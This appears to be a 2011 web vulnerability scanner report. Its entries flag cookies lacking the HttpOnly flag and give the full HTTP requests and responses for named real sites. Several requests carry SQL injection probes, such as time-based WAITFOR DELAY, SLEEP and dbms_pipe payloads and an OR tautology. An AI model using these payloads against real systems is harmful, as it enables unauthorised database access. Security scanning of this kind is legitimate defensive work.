GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:07 GMT
Expires: Thu, 31 Mar 2011 00:52:42 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQCRBACDA=NIMGJCFBPLFKBOMEJBIEBOMJ; path=/
X-Powered-By: ASP.NET
Content-Length: 793
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...
15.7. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=13&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301172041947-Repeat%7C1364244041947%3B%20s_nrgvo%3DRepeat%7C1364244041948%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; stips5=1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; dlact=dl12

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:41:00 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-64-12-70-127.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 3771
Set-Cookie: JSESSIONID=3950A7851DDDF1EFC137FA6979302802; Path=/aol
Content-Length: 3771

<span class="dn" id="#curr-dlcount">14</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl13 plid-51833 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
15.8. http://www.bizfind.us/ricerca.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /ricerca.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ricerca.asp?idregione=44&ateco=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+&pg=1&idcatul=attorneys&idcomune1=dallas HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252525594.1298903515.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/28; __utma=252525594.1551423665.1298901533.1298903515.1301415513.3

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAAQBDRSA=FFCAFCIBBCHHJGNFFAJIHPLK; path=/
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Thu, 31 Mar 2011 00:56:28 GMT
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
15.9. http://www.cramerdev.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cramerdev.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.cramerdev.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: Arcturus%2ESession%2ECookie%2EValue=; path=/
Set-Cookie: Arcturus%2ESession%2ECookie=; path=/
Set-Cookie: MarkupFactory%5FInstallation%5FHandle=cramerdev; path=/
Set-Cookie: ASPSESSIONIDAAACSQCR=FFBDMJECFMGHLGCDAMPIOKHD; path=/
X-Powered-By: Markup Factory
Date: Fri, 25 Mar 2011 19:24:26 GMT
Content-Length: 6490

<!DOCTYPE html>

<html>

<head>

<meta http-equiv="content-type" content="text/html; charset=utf-8" />

<link rel="stylesheet" type="text/css" media="screen" href="/assets/cramerdev/960.css" />

...[SNIP]...
15.10. http://www.hbccards.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hbccards.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www2.hbc.com/en/index.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:11 GMT
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Content-Length: 18564
Set-Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; path=/
Set-Cookie: X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
15.11. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:15:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
15.12. http://www.microsofttranslator.com/Ajax/V2/Widget.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.microsofttranslator.com
Path:   /Ajax/V2/Widget.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Ajax/V2/Widget.aspx?siteData=ncUzpG6DNC3ChU0huEHZCFQbqrzCQRcTVqXdHso8P2KRGM-oFXjoeYwum3D31voFEyqUPj4HjacfvEdrHEyIG8CuATkNhQmRwcZkpGVFjvVnLd1gzFP2dxWEWKdcQtE1&mode=manual&from=en&layout=ts HTTP/1.1
Host: www.microsofttranslator.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=7F6843DC4FE646E9AE270E4CF6963799; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; mstcid=352bfb89; OrigMUID=9C83C8B83DCB480D9837E32DFFAAD691%2c0db7ff218e994793a68b44ecaf2f4b7b; ClientSessionID=27577234-3286-46cb-9bee-5b3f7e387abc; SRCHD=MS=1679828&D=1644355&AF=NOFORM; MUID=9C83C8B83DCB480D9837E32DFFAAD691&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=43200
Content-Type: application/x-javascript; charset=utf-8
X-MS-Trans-Info: s=3640
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:43:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ClientSessionID=27577234-3286-46cb-9bee-5b3f7e387abc; expires=Sun, 02-Mar-2110 02:43:39 GMT; path=/
Set-Cookie: _SS=SID=2DCF47CF4267419084C3BBA97B070558; domain=.microsofttranslator.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.microsofttranslator.com; path=/
Set-Cookie: SRCHD=MS=1699303&D=1644355&AF=NOFORM; expires=Mon, 25-Mar-2013 01:43:39 GMT; domain=.microsofttranslator.com; path=/
Content-Length: 107103

.../* Copyright 2010 Microsoft Corporation */
window['_mstConfig']={appId:'Tz_-tnqAcnp2s1WSWyaNFegugm2Qb8N4bWuf0eVdHNneSXxazIr6VlZ0pl6zQr-i2',baseURL:'http://www.microsofttranslator.com/Ajax/V2/Widge
...[SNIP]...
15.13. http://www.paperg.com/jsfb/embed.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsfb/embed.php?pid=3922&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/archives/'+NSFTW+'?ordering=&searchphrase=all
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=12u7iro022m8hm0ue4bghgkd76; path=/
Content-Length: 45225
Connection: Keep-alive
Via: 1.1 AN-0016020122637050


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.
...[SNIP]...
15.14. https://www.plimus.com/jsp/buynow.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.plimus.com
Path:   /jsp/buynow.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsp/buynow.jsp?contractId=1947672 HTTP/1.1
Host: www.plimus.com
Connection: keep-alive
Referer: http://www.fast-report.com/bitrix/redirect3.php?GOTO=https%3A%2F%2Fwww.plimus.com%2Fjsp%2Fbuynow.jsp%3FcontractId%3D1947672%26GID%3DBITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: contractId=2950920; sessionId=web41946268920227930; __utmz=254660169.1299810311.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=254660169.313124860.1299810311.1299810311.1299810311.1

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:12:13 GMT
Server: Apache
Set-Cookie: contractId=1947672; Domain=.plimus.com; Expires=Tue, 20-Mar-2012 17:12:13 GMT; Secure
Set-Cookie: sessionId=web48546432239533572; Domain=.plimus.com; Expires=Tue, 20-Mar-2012 17:12:13 GMT; Secure
Keep-Alive: timeout=5, max=150
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 188883


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<tit
...[SNIP]...
15.15. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource=default; CstrStatus=RVU

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:14:03 GMT
Set-Cookie: JSESSIONID=EBDFBF9AC748937A3214EB87AF5E4C7F.app5-a2; Path=/; Secure
Set-Cookie: trafficSource=default; Expires=Sun, 24-Apr-2011 19:14:02 GMT; Path=/
Set-Cookie: CstrStatus=RVU; Expires=Sun, 24-Apr-2011 19:14:02 GMT; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a42378b;path=/;httponly
Content-Length: 21459


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
15.16. https://www.territoryahead.com/jump.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; customer=92643931

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:24:53 GMT
Server: Apache
ETag: "AAAAS7ub/Mx"
Last-Modified: Fri, 25 Mar 2011 19:13:57 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=63503913; Path=/; Expires=Fri, 08-Apr-2011 19:13:07 GMT
Set-Cookie: customer=92643931; Path=/; Expires=Sat, 23-Mar-2019 19:13:07 GMT
Set-Cookie: JSESSIONID=auMBUcQMcNOb; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38180


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
15.17. http://www.vcahospitals.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1

Response

HTTP/1.1 302 Found
Date: Fri, 25 Mar 2011 19:13:41 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=f4tq018eii0u9s0oeijn0hk6n0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 9421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Conte
...[SNIP]...
15.18. https://www2.hbc.com/contactus/contact-us.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www2.hbc.com
Path:   /contactus/contact-us.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contactus/contact-us.asp?langid=en&src=hbc HTTP/1.1
Host: www2.hbc.com
Connection: keep-alive
Referer: http://www2.hbc.com/en/index.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10777
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQXCCBAB=MBAOOEFBFOMHLNPDLIHMOMKO; secure; path=/
X-Powered-By: ASP.NET
Date: Wed, 30 Mar 2011 13:51:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
15.19. http://a1.bing4.com/fd/fb/simls  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.bing4.com
Path:   /fd/fb/simls

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/fb/simls?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_02_0_865148%26sId%3D5%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_02_0_865148%26sId%3D5%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_02_0_865148%26sId%3D5%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: a1.bing4.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_02_0_865148&sId=5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=5A3DD7A43C5B43BB87A565DA84737466; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110313; _SS=SID=9B679FC2C38D46A6AEF54858BDEBEE5C; _HOP=I=1&TS=1301101465

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/fd/fb/u?v=7_02_0_865148&sId=5#status=unknown
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sat, 26 Mar 2011 01:05:26 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1301101526; domain=.bing4.com; path=/

15.20. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=946552&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=87d2451c-50fd-11e0-8afd-003048d6d22e&_hmacv=1&_salt=327327191&_keyid=k1&_hmac=87cfa58169cdc261fd30bf9c1633447993c7cde2; bh="b!!!%1!!!?I!!!!/<qd67!!%#4!!7(q<o_%.!!)OU!!!!$<ro^P!!)Qf!!!!(<nTlX!!*cu!!!!3<qd68!!*oY!!!!%<pN)4!!-?2!!!!*<pN)4!!-Oo!!!!#<nsgt!!/DA!!!!3<qd67!!/Hd!!!!2<qd67!!/He!!!!2<qd68!!04Z!!!!#<qgdp!!1CD!!!!#<p]be!!1Mv!!!!)<qPUB!!1N=!!!!'<qPUB!!1NO!!!!$<qPUB!!1SP!!!!#<nsm5!!2-O!!!!(<nTlW!!2P@!!!!#<nAv8!!3):!!!!5<qd67!!3)?!!!!5<qd67!!3)C!!!!5<qd68!!496!!!!.<s#)C!!4@a!!!!#<q)L?!!4i7!!!!#<qbhM!!4oZ!!!!#<nA,w!!?VS!!<NC<qDX7!!M=.!!!!)<pjWE!!Mev!!!!#<oa?r!!MfS!!!!'<oaA%!!N]q!!!!$<qc5_!!PKh!!!!#<okyj!!PL)!!!!%<okyj!!PL`!!!!'<okyj!!R`u!!!!(<qd68!!Ra#!!!!(<qd68!!Ra)!!!!(<qd68!!UHs!!!!(<pLo`!!Vj^!!!!%<pLoI!!X*c!!!!#<pBKB!!X41!!!!%<pLo[!!Zwb!!!!/<pN)4!![@p!!!!$<qd4F!!bu:!!!!)<pjWE!!itb!!!!6<qd67!!j,.!!<NC<qDX7!!jW8!!!!)<pjWE!!pkJ!!!!6<qd67!!pkL!!!!6<qd68!!qrq!!!!6<qd67!!qrr!!!!6<qd67!!qrv!!!!6<qd68!!qyo!!!!2<qd68!!st`!!!!(<nA,e!!u2f!!!!#<nA,G!!uby!!!!$<rsNj!!x